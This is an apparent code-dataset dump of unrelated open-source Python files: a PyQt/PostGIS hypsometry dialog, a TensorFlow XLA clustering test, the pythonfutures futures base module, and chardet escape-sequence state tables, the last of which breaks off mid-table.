class HypsometryDialog(PersistentDialog):
def __init__(self):
PersistentDialog.__init__(self)
uic.loadUi(join(dirname(__file__), 'ui_hypsometry.ui'), self)
self.buttonBox.accepted.disconnect()
self.buttonBox.rejected.disconnect()
self.buttonRun = self.buttonBox.button(QtGui.QDialogButtonBox.Ok)
self.buttonAbort = self.buttonBox.button(QtGui.QDialogButtonBox.Abort)
self.buttonClose = self.buttonBox.button(QtGui.QDialogButtonBox.Close)
self._log = logging.getLogger('siam.hypsometry')
# self.handler = LogHandler()
# self.handler.setLevel(logging.INFO)
# formatter = logging.Formatter('%(processName)s: %(message)s')
# self.handler.setFormatter(formatter)
self._load_settings()
self.timer = QtCore.QTimer(self)
self.timer.setInterval(2000)
# self.timer.setTimerType(QtCore.VeryCoarseTimer) # QT5
self.timer.timeout.connect(self.on_timer_timeout)
self.statusBar = QtGui.QStatusBar(self)
# self.statusBar.setWidth(self.width())
self.labelTime = QtGui.QLabel(self)
# self.labelTime.setFrameShape(QtGui.QFrame.NoFrame)
self.labelTime.setText('Ready')
self.statusBar.addWidget(self.labelTime)
self.verticalLayout.addWidget(self.statusBar)
self.tic = 0
self.buttonAbort.setEnabled(False)
# def event(self, e):
# if e.type() == QtCore.QEvent.StatusTip:
# self.statusBar.showMessage(e.tip())
# return True
# return True
# @QtCore.pyqtSlot()
def on_timer_timeout(self):
self.labelTime.setText('Elapsed: {:d}s'.format(int(time.time()-self.tic)))
@QtCore.pyqtSlot(str)
def on_cbConnection_currentIndexChanged(self, name):
settings = QtCore.QSettings()
settings.beginGroup('PostgreSQL')
settings.beginGroup('connections')
settings.beginGroup(name)
self.host = settings.value('host')
self.port = settings.value('port')
self.dbname = settings.value('database')
self.user = settings.value('username')
fname = "PG:dbname='{database:s}' host={host:s} port={port:s} user='{user:s}'".format(
database = self.dbname,
host = self.host,
port = self.port,
user = self.user
)
settings.endGroup()
settings.endGroup()
settings.endGroup()
self.cbInlets.clear()
ds = ogr.Open(fname)
if ds is None:
QtGui.QMessageBox.critical(self, 'Connection failed', 'Failed to connect to a data source "{:s}"'.format(fname))
return
for i in range(ds.GetLayerCount()):
layer = ds.GetLayer(i)
if ogr.wkbPoint == layer.GetGeomType():
self.cbInlets.addItem(layer.GetName())
self.cbDEM.clear()
layer = ds.ExecuteSQL('select r_table_name from raster_columns order by r_table_name')
for f in layer:
self.cbDEM.addItem(f.GetField(0))
self.cbMap.clear()
self.cbOutput.clear()
self.cbPartitions.clear()
layer = ds.ExecuteSQL("""
SELECT table_schema || '.' || table_name as table
FROM information_schema.tables
--WHERE table_type = 'BASE TABLE'
WHERE table_schema NOT IN ('information_schema', 'pg_catalog')
ORDER BY table_schema,table_name;""")
for f in layer:
name = f.GetField(0)
self.cbMap.addItem(name)
self.cbOutput.addItem(name)
self.cbPartitions.addItem(name)
self.cbMap.setCurrentIndex(-1)
self.cbMap.setEditText('side_inlets_parts')
self.cbOutput.setCurrentIndex(-1)
self.cbOutput.setEditText('hypsometry')
self.cbPartitions.setCurrentIndex(-1)
self.cbPartitions.setEditText('dem_parts')
def _load_settings(self):
settings = QtCore.QSettings()
selected = settings.value('PostgreSQL/connections/selected') or settings.value('siam/hypsometry')
settings.beginGroup('PostgreSQL')
settings.beginGroup('connections')
self.cbConnection.addItems( settings.childGroups() )
settings.endGroup()
settings.endGroup()
if selected:
self.cbConnection.setCurrentIndex( self.cbConnection.findText(selected) )
settings.beginGroup('siam')
settings.beginGroup('hypsometry')
self.loadall(settings)
settings.endGroup()
settings.endGroup()
def _save_settings(self):
settings = QtCore.QSettings()
settings.beginGroup('siam')
settings.beginGroup('hypsometry')
self.saveall(settings)
settings.endGroup()
settings.endGroup()
# @QtCore.pyqtSlot()
def on_buttonAbort_clicked(self):
if QtGui.QMessageBox.Yes == QtGui.QMessageBox.question(
self,
QCoreApplication.translate('hypsometry', 'Are you sure?'),
QCoreApplication.translate('hypsometry', 'abort?'),
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No):
self.on_finished()
self.extractor.kill()
# self.buttonAbort.setEnabled(False)
# self.tic = 0
# self.buttonRun.setEnabled(True)
# @QtCore.pyqtSlot()
def on_buttonClose_clicked(self):
if self.tic == 0 or QtGui.QMessageBox.Yes == QtGui.QMessageBox.question(
self,
QCoreApplication.translate('hypsometry', 'Are you sure?'),
QCoreApplication.translate('hypsometry', 'close?'),
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No):
self.reject()
# @QtCore.pyqtSlot(QtGui.QAbstractButton)
def on_buttonBox_clicked(self, button):
sb = self.buttonBox.standardButton(button)
dispatcher = {
QtGui.QDialogButtonBox.Ok: self.on_buttonRun_clicked,
QtGui.QDialogButtonBox.Close: self.on_buttonClose_clicked,
QtGui.QDialogButtonBox.Abort: self.on_buttonAbort_clicked
}
if dispatcher.has_key(sb):
dispatcher[sb]()
# def reject(self):
# QtGui.QMessageBox.question(self, 'hello', 'reject()')
# def accept(self):
# # super(HypsometryDialog, self).accept()
@QtCore.pyqtSlot()
def on_buttonRun_clicked(self):
self._save_settings()
self.thread = QtCore.QThread(self) # self
args = dict(
host=self.host,
port=self.port,
dbname=self.dbname,
user=self.user,
dem_table=str(self.cbDEM.currentText()),
dem_parts=str(self.cbPartitions.currentText()),
parts_map=str(self.cbMap.currentText()),
layer=str(self.cbInlets.currentText()),
out="PG:host={host:s} port={port:s} dbname='{dbname:s}' user='{user:s}'".format(
host=self.host, port=self.port, dbname=self.dbname, user=self.user),
table=str(self.cbOutput.currentText()),
max_height=self.sbMaxStage.value(),
max_area=self.sbMaxArea.value(),
step=self.sbStep.value(),
radius=self.sbRadius.value(),
fixup=False,
where=None,
threads=mp.cpu_count(),
mp=True,
find_bottom=self.checkBoxFindBottom.checkState(),
_loglevel=self._log.getEffectiveLevel()
)
self.extractor = Worker(args)
self.thread.started.connect(self.extractor.start)
self.thread.finished.connect(self.on_finished)
# self.extractor.finished.connect(self.thread.quit)
QtCore.QObject.connect(self.extractor, QtCore.SIGNAL("finished()"),
self.thread.quit)
self.extractor.moveToThread(self.thread)
self.buttonRun.setEnabled(False)
self.buttonAbort.setEnabled(True)
self.thread.start()
self.tic = time.time()
self.timer.start()
def on_finished(self):
self.timer.stop()
# self._log.removeHandler(self.handler)
self.tic = 0
self.buttonRun.setEnabled(True)
self.buttonAbort.setEnabled(False)
class Worker(QtCore.QObject, Starter):
""" Worker object to fetch hypsometry polygons in separate thread """
finished = QtCore.pyqtSignal()
def __init__(self, args):
super(Worker, self).__init__()
Starter.__init__(self, args)
@QtCore.pyqtSlot()
def start(self):
self.run()
self.finished.emit()
| gpl-3.0 |
nightjean/Deep-Learning | tensorflow/compiler/tests/clustering_test.py | 123 | 3878 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the behavior of the auto-compilation pass."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import googletest
CPU_DEVICE = "/job:localhost/replica:0/task:0/cpu:0"
class ClusteringTest(XLATestCase):
def testAdd(self):
val1 = np.array([4, 3, 2, 1], dtype=np.float32)
val2 = np.array([5, 6, 7, 8], dtype=np.float32)
expected = val1 + val2
with self.test_session():
with self.test_scope():
input1 = constant_op.constant(val1, name="const1")
input2 = constant_op.constant(val2, name="const2")
output = math_ops.add(input1, input2)
result = output.eval()
self.assertAllClose(result, expected, rtol=1e-3)
def testAddFromCpuMultiple(self):
val1 = np.array([4, 3, 2, 1]).astype(np.float32)
val2 = np.array([5, 6, 7, 8]).astype(np.float32)
expected = val1 + val2
with self.test_session():
with ops.device(CPU_DEVICE):
input1 = constant_op.constant(val1, name="const1")
input2 = constant_op.constant(val2, name="const2")
with self.test_scope():
output = math_ops.add(input1, input2)
for _ in xrange(10):
result = output.eval()
self.assertAllClose(result, expected, rtol=1e-3)
def testDeadlock(self):
# Builds a graph of the form:
# x -> y
# | \
# z -> w
# where x and z are placed on the CPU and y and w are placed on the XLA
# device. If y and w are clustered for compilation, then the graph will
# deadlock since the clustered graph will contain a self-loop.
with self.test_session() as sess:
with ops.device(CPU_DEVICE):
x = array_ops.placeholder(dtypes.float32, [2])
with self.test_scope():
y = x * 2
with ops.device(CPU_DEVICE):
z = y * y
with self.test_scope():
w = y + z
result = sess.run(w, {x: [1.5, 0.5]})
self.assertAllClose(result, [12., 2.], rtol=1e-3)
def testHostMemory(self):
with self.test_session() as sess:
x = array_ops.placeholder(dtypes.int32)
with self.test_scope():
y = x + 1
with ops.device(CPU_DEVICE):
# Place a computation on the CPU, so y and w cannot be merged into the
# same JIT compilation.
z = y * 2
with self.test_scope():
# Argument 'y' is a non-constant output of a previous cluster. Make sure
# it is properly copied to host memory so it can be used as a
# compile-time constant input for this cluster.
w = array_ops.reshape(z, y)
result = sess.run(w, {x: [1, 0]})
expected = np.array([[4], [2]], dtype=np.int32)
self.assertAllClose(expected, result, rtol=1e-3)
if __name__ == "__main__":
googletest.main()
| apache-2.0 |
akhil22/YouCompleteMe | third_party/pythonfutures/concurrent/futures/_base.py | 89 | 19642 | # Copyright 2009 Brian Quinlan. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
from __future__ import with_statement
import logging
import threading
import time
try:
from collections import namedtuple
except ImportError:
from concurrent.futures._compat import namedtuple
__author__ = 'Brian Quinlan (brian@sweetapp.com)'
FIRST_COMPLETED = 'FIRST_COMPLETED'
FIRST_EXCEPTION = 'FIRST_EXCEPTION'
ALL_COMPLETED = 'ALL_COMPLETED'
_AS_COMPLETED = '_AS_COMPLETED'
# Possible future states (for internal use by the futures package).
PENDING = 'PENDING'
RUNNING = 'RUNNING'
# The future was cancelled by the user...
CANCELLED = 'CANCELLED'
# ...and _Waiter.add_cancelled() was called by a worker.
CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'
FINISHED = 'FINISHED'
_FUTURE_STATES = [
PENDING,
RUNNING,
CANCELLED,
CANCELLED_AND_NOTIFIED,
FINISHED
]
_STATE_TO_DESCRIPTION_MAP = {
PENDING: "pending",
RUNNING: "running",
CANCELLED: "cancelled",
CANCELLED_AND_NOTIFIED: "cancelled",
FINISHED: "finished"
}
# Logger for internal use by the futures package.
LOGGER = logging.getLogger("concurrent.futures")
class Error(Exception):
"""Base class for all future-related exceptions."""
pass
class CancelledError(Error):
"""The Future was cancelled."""
pass
class TimeoutError(Error):
"""The operation exceeded the given deadline."""
pass
class _Waiter(object):
"""Provides the event that wait() and as_completed() block on."""
def __init__(self):
self.event = threading.Event()
self.finished_futures = []
def add_result(self, future):
self.finished_futures.append(future)
def add_exception(self, future):
self.finished_futures.append(future)
def add_cancelled(self, future):
self.finished_futures.append(future)
class _AsCompletedWaiter(_Waiter):
"""Used by as_completed()."""
def __init__(self):
super(_AsCompletedWaiter, self).__init__()
self.lock = threading.Lock()
def add_result(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_result(future)
self.event.set()
def add_exception(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_exception(future)
self.event.set()
def add_cancelled(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_cancelled(future)
self.event.set()
class _FirstCompletedWaiter(_Waiter):
"""Used by wait(return_when=FIRST_COMPLETED)."""
def add_result(self, future):
super(_FirstCompletedWaiter, self).add_result(future)
self.event.set()
def add_exception(self, future):
super(_FirstCompletedWaiter, self).add_exception(future)
self.event.set()
def add_cancelled(self, future):
super(_FirstCompletedWaiter, self).add_cancelled(future)
self.event.set()
class _AllCompletedWaiter(_Waiter):
"""Used by wait(return_when=FIRST_EXCEPTION and ALL_COMPLETED)."""
def __init__(self, num_pending_calls, stop_on_exception):
self.num_pending_calls = num_pending_calls
self.stop_on_exception = stop_on_exception
self.lock = threading.Lock()
super(_AllCompletedWaiter, self).__init__()
def _decrement_pending_calls(self):
with self.lock:
self.num_pending_calls -= 1
if not self.num_pending_calls:
self.event.set()
def add_result(self, future):
super(_AllCompletedWaiter, self).add_result(future)
self._decrement_pending_calls()
def add_exception(self, future):
super(_AllCompletedWaiter, self).add_exception(future)
if self.stop_on_exception:
self.event.set()
else:
self._decrement_pending_calls()
def add_cancelled(self, future):
super(_AllCompletedWaiter, self).add_cancelled(future)
self._decrement_pending_calls()
class _AcquireFutures(object):
"""A context manager that does an ordered acquire of Future conditions."""
def __init__(self, futures):
self.futures = sorted(futures, key=id)
def __enter__(self):
for future in self.futures:
future._condition.acquire()
def __exit__(self, *args):
for future in self.futures:
future._condition.release()
def _create_and_install_waiters(fs, return_when):
if return_when == _AS_COMPLETED:
waiter = _AsCompletedWaiter()
elif return_when == FIRST_COMPLETED:
waiter = _FirstCompletedWaiter()
else:
pending_count = sum(
f._state not in [CANCELLED_AND_NOTIFIED, FINISHED] for f in fs)
if return_when == FIRST_EXCEPTION:
waiter = _AllCompletedWaiter(pending_count, stop_on_exception=True)
elif return_when == ALL_COMPLETED:
waiter = _AllCompletedWaiter(pending_count, stop_on_exception=False)
else:
raise ValueError("Invalid return condition: %r" % return_when)
for f in fs:
f._waiters.append(waiter)
return waiter
def as_completed(fs, timeout=None):
"""An iterator over the given futures that yields each as it completes.
Args:
fs: The sequence of Futures (possibly created by different Executors) to
iterate over.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
Returns:
An iterator that yields the given Futures as they complete (finished or
cancelled).
Raises:
TimeoutError: If the entire result iterator could not be generated
before the given timeout.
"""
if timeout is not None:
end_time = timeout + time.time()
with _AcquireFutures(fs):
finished = set(
f for f in fs
if f._state in [CANCELLED_AND_NOTIFIED, FINISHED])
pending = set(fs) - finished
waiter = _create_and_install_waiters(fs, _AS_COMPLETED)
try:
for future in finished:
yield future
while pending:
if timeout is None:
wait_timeout = None
else:
wait_timeout = end_time - time.time()
if wait_timeout < 0:
raise TimeoutError(
'%d (of %d) futures unfinished' % (
len(pending), len(fs)))
waiter.event.wait(wait_timeout)
with waiter.lock:
finished = waiter.finished_futures
waiter.finished_futures = []
waiter.event.clear()
for future in finished:
yield future
pending.remove(future)
finally:
for f in fs:
f._waiters.remove(waiter)
DoneAndNotDoneFutures = namedtuple(
'DoneAndNotDoneFutures', 'done not_done')
def wait(fs, timeout=None, return_when=ALL_COMPLETED):
"""Wait for the futures in the given sequence to complete.
Args:
fs: The sequence of Futures (possibly created by different Executors) to
wait upon.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
return_when: Indicates when this function should return. The options
are:
FIRST_COMPLETED - Return when any future finishes or is
cancelled.
FIRST_EXCEPTION - Return when any future finishes by raising an
exception. If no future raises an exception
then it is equivalent to ALL_COMPLETED.
ALL_COMPLETED - Return when all futures finish or are cancelled.
Returns:
A named 2-tuple of sets. The first set, named 'done', contains the
futures that completed (is finished or cancelled) before the wait
completed. The second set, named 'not_done', contains uncompleted
futures.
"""
with _AcquireFutures(fs):
done = set(f for f in fs
if f._state in [CANCELLED_AND_NOTIFIED, FINISHED])
not_done = set(fs) - done
if (return_when == FIRST_COMPLETED) and done:
return DoneAndNotDoneFutures(done, not_done)
elif (return_when == FIRST_EXCEPTION) and done:
if any(f for f in done
if not f.cancelled() and f.exception() is not None):
return DoneAndNotDoneFutures(done, not_done)
if len(done) == len(fs):
return DoneAndNotDoneFutures(done, not_done)
waiter = _create_and_install_waiters(fs, return_when)
waiter.event.wait(timeout)
for f in fs:
f._waiters.remove(waiter)
done.update(waiter.finished_futures)
return DoneAndNotDoneFutures(done, set(fs) - done)
class Future(object):
"""Represents the result of an asynchronous computation."""
def __init__(self):
"""Initializes the future. Should not be called by clients."""
self._condition = threading.Condition()
self._state = PENDING
self._result = None
self._exception = None
self._waiters = []
self._done_callbacks = []
def _invoke_callbacks(self):
for callback in self._done_callbacks:
try:
callback(self)
except Exception:
LOGGER.exception('exception calling callback for %r', self)
def __repr__(self):
with self._condition:
if self._state == FINISHED:
if self._exception:
return '<Future at %s state=%s raised %s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state],
self._exception.__class__.__name__)
else:
return '<Future at %s state=%s returned %s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state],
self._result.__class__.__name__)
return '<Future at %s state=%s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state])
def cancel(self):
"""Cancel the future if possible.
Returns True if the future was cancelled, False otherwise. A future
cannot be cancelled if it is running or has already completed.
"""
with self._condition:
if self._state in [RUNNING, FINISHED]:
return False
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
return True
self._state = CANCELLED
self._condition.notify_all()
self._invoke_callbacks()
return True
def cancelled(self):
"""Return True if the future has cancelled."""
with self._condition:
return self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]
def running(self):
"""Return True if the future is currently executing."""
with self._condition:
return self._state == RUNNING
def done(self):
"""Return True of the future was cancelled or finished executing."""
with self._condition:
return self._state in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]
def __get_result(self):
if self._exception:
raise self._exception
else:
return self._result
def add_done_callback(self, fn):
"""Attaches a callable that will be called when the future finishes.
Args:
fn: A callable that will be called with this future as its only
argument when the future completes or is cancelled. The callable
will always be called by a thread in the same process in which
it was added. If the future has already completed or been
cancelled then the callable will be called immediately. These
callables are called in the order that they were added.
"""
with self._condition:
if self._state not in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]:
self._done_callbacks.append(fn)
return
fn(self)
def result(self, timeout=None):
"""Return the result of the call that the future represents.
Args:
timeout: The number of seconds to wait for the result if the future
isn't done. If None, then there is no limit on the wait time.
Returns:
The result of the call that the future represents.
Raises:
CancelledError: If the future was cancelled.
TimeoutError: If the future didn't finish executing before the given
timeout.
Exception: If the call raised then that exception will be raised.
"""
with self._condition:
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self.__get_result()
self._condition.wait(timeout)
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self.__get_result()
else:
raise TimeoutError()
def exception(self, timeout=None):
"""Return the exception raised by the call that the future represents.
Args:
timeout: The number of seconds to wait for the exception if the
future isn't done. If None, then there is no limit on the wait
time.
Returns:
The exception raised by the call that the future represents or None
if the call completed without raising.
Raises:
CancelledError: If the future was cancelled.
TimeoutError: If the future didn't finish executing before the given
timeout.
"""
with self._condition:
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self._exception
self._condition.wait(timeout)
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self._exception
else:
raise TimeoutError()
# The following methods should only be used by Executors and in tests.
def set_running_or_notify_cancel(self):
"""Mark the future as running or process any cancel notifications.
Should only be used by Executor implementations and unit tests.
If the future has been cancelled (cancel() was called and returned
True) then any threads waiting on the future completing (though calls
to as_completed() or wait()) are notified and False is returned.
If the future was not cancelled then it is put in the running state
(future calls to running() will return True) and True is returned.
This method should be called by Executor implementations before
executing the work associated with this future. If this method returns
False then the work should not be executed.
Returns:
False if the Future was cancelled, True otherwise.
Raises:
RuntimeError: if this method was already called or if set_result()
or set_exception() was called.
"""
with self._condition:
if self._state == CANCELLED:
self._state = CANCELLED_AND_NOTIFIED
for waiter in self._waiters:
waiter.add_cancelled(self)
# self._condition.notify_all() is not necessary because
# self.cancel() triggers a notification.
return False
elif self._state == PENDING:
self._state = RUNNING
return True
else:
LOGGER.critical('Future %s in unexpected state: %s',
id(self.future),
self.future._state)
raise RuntimeError('Future in unexpected state')
def set_result(self, result):
"""Sets the return value of work associated with the future.
Should only be used by Executor implementations and unit tests.
"""
with self._condition:
self._result = result
self._state = FINISHED
for waiter in self._waiters:
waiter.add_result(self)
self._condition.notify_all()
self._invoke_callbacks()
def set_exception(self, exception):
"""Sets the result of the future as being the given exception.
Should only be used by Executor implementations and unit tests.
"""
with self._condition:
self._exception = exception
self._state = FINISHED
for waiter in self._waiters:
waiter.add_exception(self)
self._condition.notify_all()
self._invoke_callbacks()
class Executor(object):
"""This is an abstract base class for concrete asynchronous executors."""
def submit(self, fn, *args, **kwargs):
"""Submits a callable to be executed with the given arguments.
Schedules the callable to be executed as fn(*args, **kwargs) and returns
a Future instance representing the execution of the callable.
Returns:
A Future representing the given call.
"""
raise NotImplementedError()
def map(self, fn, *iterables, **kwargs):
"""Returns a iterator equivalent to map(fn, iter).
Args:
fn: A callable that will take as many arguments as there are
passed iterables.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
Returns:
An iterator equivalent to: map(func, *iterables) but the calls may
be evaluated out-of-order.
Raises:
TimeoutError: If the entire result iterator could not be generated
before the given timeout.
Exception: If fn(*args) raises for any values.
"""
timeout = kwargs.get('timeout')
if timeout is not None:
end_time = timeout + time.time()
fs = [self.submit(fn, *args) for args in zip(*iterables)]
try:
for future in fs:
if timeout is None:
yield future.result()
else:
yield future.result(end_time - time.time())
finally:
for future in fs:
future.cancel()
def shutdown(self, wait=True):
"""Clean-up the resources associated with the Executor.
It is safe to call this method several times. Otherwise, no other
methods can be called after this one.
Args:
wait: If True then shutdown will not return until all running
futures have finished executing and the resources used by the
executor have been reclaimed.
"""
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown(wait=True)
return False
| gpl-3.0 |
anakinsolo/backend | Lib/site-packages/pip/_vendor/requests/packages/chardet/escsm.py | 2930 | 7839 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
HZ_cls = (
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
)
HZ_st = (
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
)
HZCharLenTable = (0, 0, 0, 0, 0, 0)
HZSMModel = {'classTable': HZ_cls,
'classFactor': 6,
'stateTable': HZ_st,
'charLenTable': HZCharLenTable,
'name': "HZ-GB-2312"}
ISO2022CN_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022CN_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
)
ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022CNSMModel = {'classTable': ISO2022CN_cls,
'classFactor': 9,
'stateTable': ISO2022CN_st,
'charLenTable': ISO2022CNCharLenTable,
'name': "ISO-2022-CN"}
ISO2022JP_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022JP_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
